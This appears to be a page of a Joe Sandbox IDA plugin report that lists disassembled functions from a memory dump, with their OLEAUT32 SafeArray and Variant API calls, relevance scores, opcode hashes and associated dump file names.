Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
String ID:
API String ID: 2723946344-0
Opcode ID: 18e61682b162347e42d8c634b94f810db48ec6356359be805e26ecf9826b52ac
Instruction ID: 92fc8f77cc86eb0cdd57f9eed9b32c1f08c296e9ad674ecdaea2f2b1dd22324d
Opcode Fuzzy Hash: 18e61682b162347e42d8c634b94f810db48ec6356359be805e26ecf9826b52ac
Instruction Fuzzy Hash: AA9146B55083019FEB04CF28C880B5AB7F5BFC9314F158A5EE99597352E770E905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D085140 Relevance: 21.2, APIs: 14, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6D085177

Part of subcall function 6D092820: _malloc.LIBCMT ref: 6D092871

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6D0851B9
SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6D0851D5
SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6D0851E5
_memmove.LIBCMT ref: 6D0851FF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D085208
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D08522C
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6D085263
VariantClear.OLEAUT32(?), ref: 6D08526C
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6D0852AD
VariantClear.OLEAUT32(?), ref: 6D0852B6
SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6D0852D2
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D08534E
VariantClear.OLEAUT32(?), ref: 6D085358

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
String ID:
API String ID: 452649785-0
Opcode ID: 4c55988399c14f0b28a03f8d87610cd92a6dd60727e15644a680f3000724bc33
Instruction ID: b07d2e39ab18a2bda5550d375f12f721c35e51ab5f326b08dd6433dcf2daf309
Opcode Fuzzy Hash: 4c55988399c14f0b28a03f8d87610cd92a6dd60727e15644a680f3000724bc33
Instruction Fuzzy Hash: 517119B5A0021AEBEB00CFA5D884BEFBBB9FF49704F008159E915D7241E774E945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D0844C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6D0844FF
VariantInit.OLEAUT32(?), ref: 6D084505
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D084516
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D084551
VariantClear.OLEAUT32(?), ref: 6D08455A
SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6D084579
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D084594
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6D0845B5
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6D0845CE
std::tr1::_Xweak.LIBCPMT ref: 6D08475A
SafeArrayDestroy.OLEAUT32(?), ref: 6D084777
VariantClear.OLEAUT32(?), ref: 6D084787
VariantClear.OLEAUT32(?), ref: 6D08478D

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
String ID:
API String ID: 1304965753-0
Opcode ID: 5c67603afc0bfbc4f82f8c3df1f05b30941c4d5749b75ed4791ce820a4a501d1
Instruction ID: b91b19d4e231ff74bf132e3f0b59ad42fe0a1d0b992657fef034f3a054fda04d
Opcode Fuzzy Hash: 5c67603afc0bfbc4f82f8c3df1f05b30941c4d5749b75ed4791ce820a4a501d1
Instruction Fuzzy Hash: 0DA13C75A00206ABDB14DFA4C984EAFB7B9FF8C710F14466DE506EB781CA34E941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D08BF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6D08BF3D
VariantInit.OLEAUT32(?), ref: 6D08BF4A
VariantInit.OLEAUT32(?), ref: 6D08BF50
VariantInit.OLEAUT32(?), ref: 6D08BF56
VariantInit.OLEAUT32 ref: 6D08C04D
VariantCopy.OLEAUT32(?,?), ref: 6D08C054
VariantInit.OLEAUT32 ref: 6D08C085
VariantCopy.OLEAUT32(?,?), ref: 6D08C08C
VariantClear.OLEAUT32(?), ref: 6D08C118
VariantClear.OLEAUT32(?), ref: 6D08C11E
VariantClear.OLEAUT32(?), ref: 6D08C124
VariantClear.OLEAUT32(?), ref: 6D08C12A

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: 7f1060b6d79c60dc6f7b62152d150793b71672accc70efd5533b7cb5db26819d
Instruction ID: 1fb4783066b780d90788fc2cc08caef6c899fb220db5c29846fc64fbca0595ea
Opcode Fuzzy Hash: 7f1060b6d79c60dc6f7b62152d150793b71672accc70efd5533b7cb5db26819d
Instruction Fuzzy Hash: FC817A71900259AFEF04DFA8C884FEEBBB9FF49304F144259E905AB241DB75E905CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6D0864D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6D08650C
VariantInit.OLEAUT32(?), ref: 6D086519
VariantInit.OLEAUT32(?), ref: 6D086520
SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6D086531
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D08656D
VariantClear.OLEAUT32(?), ref: 6D086576
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D0865B6
VariantClear.OLEAUT32(?), ref: 6D0865BF
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D086666
VariantClear.OLEAUT32(?), ref: 6D086677
VariantClear.OLEAUT32(?), ref: 6D08667E
VariantClear.OLEAUT32(?), ref: 6D086685

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: 3352d1eec4f84b967a34d247be29277e0e433d8d67f389a1439bcc2156302d04
Instruction ID: 269adf9dc7238fe0d37b371ba50d46d61cd2adcaa4ea7a4ac3cb5d08a81b1056
Opcode Fuzzy Hash: 3352d1eec4f84b967a34d247be29277e0e433d8d67f389a1439bcc2156302d04
Instruction Fuzzy Hash: 9F513772118301AFDB00DF64C880B6BBBF8EFD9710F018A5DFA5587251DB71E9058B92

Uniqueness

Uniqueness Score: -1.00%

Function 6D08CB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6D08CBCA
VariantInit.OLEAUT32(?), ref: 6D08CBD3
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D08CBE4
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D08CBF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D08CC0D
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6D08CC39
VariantClear.OLEAUT32(?), ref: 6D08CC42
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6D08CC5D
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6D08CC77
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D08CCEC
VariantClear.OLEAUT32(?), ref: 6D08CCFC
VariantClear.OLEAUT32(?), ref: 6D08CD02

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
String ID:
API String ID: 3548156019-0
Opcode ID: 1d922b2b12d4f77ee32714166f410a4a211e136caa9b8643e5fb9c82ed5a70b4
Instruction ID: 7d4d66cd220a25d534f33582a1d36e2f7e65754c5dae05fa5d7c2b85038488fc
Opcode Fuzzy Hash: 1d922b2b12d4f77ee32714166f410a4a211e136caa9b8643e5fb9c82ed5a70b4
Instruction Fuzzy Hash: 1B511FB5D0024AAFDB00DFA4C884EEEBBB8FF49714F00815AEA15E7241D771E945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D07A350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6D07A393
VariantInit.OLEAUT32(?), ref: 6D07A39A
VariantInit.OLEAUT32(?), ref: 6D07A3A1
VariantCopy.OLEAUT32(?,?), ref: 6D07A3EF
VariantClear.OLEAUT32(?), ref: 6D07A409
VariantClear.OLEAUT32(?), ref: 6D07A50A
VariantClear.OLEAUT32(?), ref: 6D07A511
VariantClear.OLEAUT32(?), ref: 6D07A518
VariantClear.OLEAUT32(?), ref: 6D07A55E
VariantClear.OLEAUT32(?), ref: 6D07A565
VariantClear.OLEAUT32(?), ref: 6D07A56C

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Clear$Init$Copy
String ID:
API String ID: 3214764494-0
Opcode ID: 8ed9f9f8e025641ca1e7fdefc1804cf805e86ca18b3da45e1ee6ef75a6cd20fd
Instruction ID: 059d2952fdecd876ca215121c37ff5f7937d158e389685424f8571c63f1922f5
Opcode Fuzzy Hash: 8ed9f9f8e025641ca1e7fdefc1804cf805e86ca18b3da45e1ee6ef75a6cd20fd
Instruction Fuzzy Hash: 467114726083419FE710DF69C880F5AB7E8BB89714F108A5DFA59DB291DB31E904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D08CD20 Relevance: 15.5, APIs: 10, Instructions: 485
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6D08CD5C
VariantInit.OLEAUT32(?), ref: 6D08CD65
VariantInit.OLEAUT32(?), ref: 6D08CD6B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D08CD76
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D08CDAA
VariantClear.OLEAUT32(?), ref: 6D08CDB7
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D08D2A5
VariantClear.OLEAUT32(?), ref: 6D08D2B5
VariantClear.OLEAUT32(?), ref: 6D08D2BB
VariantClear.OLEAUT32(?), ref: 6D08D2C1

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: c6ff3c74bd289d1b184469d22f20204d70e2de4ccf7284e468a2ce51d20ab5e7
Instruction ID: 5e26c8cf69f01a36e1a404222bd6c63c46f034988dfd19d250030dd86ccec314
Opcode Fuzzy Hash: c6ff3c74bd289d1b184469d22f20204d70e2de4ccf7284e468a2ce51d20ab5e7
Instruction Fuzzy Hash: 7E120775A15706AFDB18DB94DD84DAAB3B9BF8C300F14466CF50AABB91CA30F841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0849B0 Relevance: 15.2, APIs: 10, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(6D0E05A8), ref: 6D0849EE
VariantInit.OLEAUT32(?), ref: 6D0849F7
VariantInit.OLEAUT32(?), ref: 6D0849FD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D084A08
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D084A39
VariantClear.OLEAUT32(?), ref: 6D084A45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D084B66
VariantClear.OLEAUT32(?), ref: 6D084B76
VariantClear.OLEAUT32(?), ref: 6D084B7C
VariantClear.OLEAUT32(6D0E05A8), ref: 6D084B82

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 468c6e74b2cc854dd4b0971208f9bd98dd785b57853d475d32f918158a004db1
Instruction ID: e3d3962083edd004c36e74bc47967ffae3ab07799b80fd792b2233737d62caca
Opcode Fuzzy Hash: 468c6e74b2cc854dd4b0971208f9bd98dd785b57853d475d32f918158a004db1
Instruction Fuzzy Hash: 34512772A0021AAFDB04DFA4CC84FAEB7B9FF89710F054169E915EB245D735E901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D0847D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D08480C
VariantInit.OLEAUT32(?), ref: 6D084815
VariantInit.OLEAUT32(?), ref: 6D08481B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D084826
SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6D08485B
VariantClear.OLEAUT32(?), ref: 6D084868
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D084974
VariantClear.OLEAUT32(?), ref: 6D084984
VariantClear.OLEAUT32(?), ref: 6D08498A
VariantClear.OLEAUT32(?), ref: 6D084990

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: a3c7797dcd31c8a1d18fc77f68277c340f958f1fc6659361e09621d8b743997e
Instruction ID: e8af5ddb7260f336757cedcc0ab29cb57edbdd25d5b3186ca7dd2a07654fc8be
Opcode Fuzzy Hash: a3c7797dcd31c8a1d18fc77f68277c340f958f1fc6659361e09621d8b743997e
Instruction Fuzzy Hash: 5C51387290420AEFDB14DFA4C880EAEB7BAFF89310F15456DE605EB641D770E905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D0866A0 Relevance: 15.2, APIs: 10, Instructions: 155COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 6D0866DB
VariantInit.OLEAUT32 ref: 6D0866EA
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D086700
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D08673A
VariantClear.OLEAUT32(?), ref: 6D086747
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D086787
VariantClear.OLEAUT32(?), ref: 6D086794
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D086849
VariantClear.OLEAUT32(?), ref: 6D08685A
VariantClear.OLEAUT32(?), ref: 6D086861

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
String ID:
API String ID: 551789342-0
Opcode ID: 32ef11063f811e335ffd542e3b93fed33651ba0b6a370b008092f8fd8440829c
Instruction ID: e59bc361896a0389ef7313b715137e9fb9b07211b9803e4c4710b63a2e1e7b8d
Opcode Fuzzy Hash: 32ef11063f811e335ffd542e3b93fed33651ba0b6a370b008092f8fd8440829c
Instruction Fuzzy Hash: 3B516876508206AFDB00CF64C844B5BBBF9EFC9B14F018A5DF9599B251DB30E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D086B10 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6D086C8B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6D086CA6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6D086CC7

Part of subcall function 6D085760: std::tr1::_Xweak.LIBCPMT ref: 6D085769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D086CF9

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6D086F13
InterlockedCompareExchange.KERNEL32(6D10C6A4,45524548,4B4F4F4C), ref: 6D086F34

Strings

.m, xrefs: 6D086ECB, 6D086EEC, 6D086ECE
.m, xrefs: 6D086F41

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID: .m$ .m
API String ID: 2722669376-3986117762
Opcode ID: 548fd9d53e65cfea0bdd687e2767baa02663c56e73b81129476b39a496357fe8
Instruction ID: a9a4804f32ac3efd935a4fbb42c12c6e0397a0bb620eed76fabbb4b6991959ac
Opcode Fuzzy Hash: 548fd9d53e65cfea0bdd687e2767baa02663c56e73b81129476b39a496357fe8
Instruction Fuzzy Hash: 08D1CEB1A142059FFF10CFA4C884BAE77F8BF45304F568469EA15AB282D774E840CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D08840E Relevance: 13.8, APIs: 9, Instructions: 332COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0884BF
